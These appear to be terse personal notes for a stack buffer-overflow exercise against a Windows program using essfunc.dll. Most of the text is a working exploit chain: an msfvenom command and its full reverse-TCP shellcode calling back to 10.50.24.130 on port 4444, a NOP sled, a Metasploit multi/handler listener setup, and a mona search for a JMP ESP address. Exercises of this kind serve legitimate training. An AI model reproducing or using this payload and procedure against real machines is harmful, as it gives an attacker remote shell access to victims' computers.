Immunity Debugger-press play-run script

set wiremask.eu string to 5000 length

msfvenom -p windows/shell/reverse_tcp lhost=10.50.24.130 lport=4444 -b "\x00" -f python


buf += b"\xd9\xe1\xba\x9e\xf2\xa0\x8d\xd9\x74\x24\xf4\x5b"
buf += b"\x31\xc9\xb1\x59\x83\xc3\x04\x31\x53\x15\x03\x53"
buf += b"\x15\x7c\x07\x5c\x65\x0f\xe8\x9d\x76\x6f\xd8\x4f"
buf += b"\xff\x8a\x7e\xfb\x52\x64\xf4\xa9\x5e\x0f\x58\x5a"
buf += b"\xd4\x7d\x75\x6d\x5d\xcb\xa3\x40\x5e\xfa\x6b\x0e"
buf += b"\x9c\x9d\x17\x4d\xf1\x7d\x29\x9e\x04\x7c\x6e\x68"
buf += b"\x62\x91\x22\x3c\x07\x3f\xd3\x49\x55\x83\xd2\x9d"
buf += b"\xd1\xbb\xac\x98\x26\x4f\x01\xa2\x76\x24\xc1\x84"
buf += b"\x77\xe9\x79\x8c\x6f\x5d\xfb\xc4\xe4\x61\x4a\x5c"
buf += b"\x30\x12\x7d\x9d\x38\xf2\x4f\xa1\x97\x3b\x60\x2c"
buf += b"\xe9\x7c\x47\xcf\x9c\x76\xbb\x72\xa7\x4d\xc1\xa8"
buf += b"\x22\x51\x61\x3a\x94\xb5\x93\xef\x43\x3e\x9f\x44"
buf += b"\x07\x18\xbc\x5b\xc4\x13\xb8\xd0\xeb\xf3\x48\xa2"
buf += b"\xcf\xd7\x11\x70\x71\x4e\xfc\xd7\x8e\x90\x58\x87"
buf += b"\x2a\xdb\x4b\xde\x4b\x24\x94\xdf\x11\xb2\x58\x12"
buf += b"\xaa\x42\xf7\x25\xd9\x70\x58\x9e\x75\x38\x11\x38"
buf += b"\x81\x49\x35\xbb\x5d\xf1\x56\x45\x5e\x01\x7e\x82"
buf += b"\x0a\x51\xe8\x23\x33\x3a\xe8\xcc\xe6\xd6\xe2\x5a"
buf += b"\x03\x14\xeb\x18\x7b\x5a\x0b\x0c\x20\xd3\xed\x7e"
buf += b"\x88\xb3\xa1\x3e\x78\x73\x12\xd7\x92\x7c\x4d\xc7"
buf += b"\x9c\x57\xe6\x62\x73\x01\x5e\x1b\xea\x08\x14\xba"
buf += b"\xf3\x87\x50\xfc\x78\x2d\xa4\xb3\x88\x44\xb6\xa4"
buf += b"\xee\xa6\x46\x35\x9b\xa6\x2c\x31\x0d\xf1\xd8\x3b"
buf += b"\x68\x35\x47\xc3\x5f\x46\x80\x3b\x1e\x7e\xfa\x0a"
buf += b"\xb4\x3e\x94\x72\x58\xbe\x64\x25\x32\xbe\x0c\x91"
buf += b"\x66\xed\x29\xde\xb2\x82\xe1\x4b\x3d\xf2\x56\xdb"
buf += b"\x55\xf8\x81\x2b\xfa\x03\xe4\x2f\xfd\xfb\x7a\x18"
buf += b"\xa6\x93\x84\x18\x56\x63\xef\x98\x06\x0b\xe4\xb7"
buf += b"\xa9\xfb\x05\x12\xe2\x93\x8c\xf3\x40\x02\x90\xd9"
buf += b"\x05\x9a\x91\xee\x9d\x2d\xeb\x9f\x22\xce\x0c\xb6"
buf += b"\x46\xcf\x0c\xb6\x78\xec\xda\x8f\x0e\x33\xdf\xab"
buf += b"\x01\x06\x42\x9d\x8b\x68\xd0\xdd\x99"


buf += "\x90" * 10   #nop sled before the shellcode


msfconsole
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 0.0.0.0
LPORT was already set to 4444 for us

in immunity debugger at the bottom enter(!mona jmp -r ESP -m "essfunc.dll")
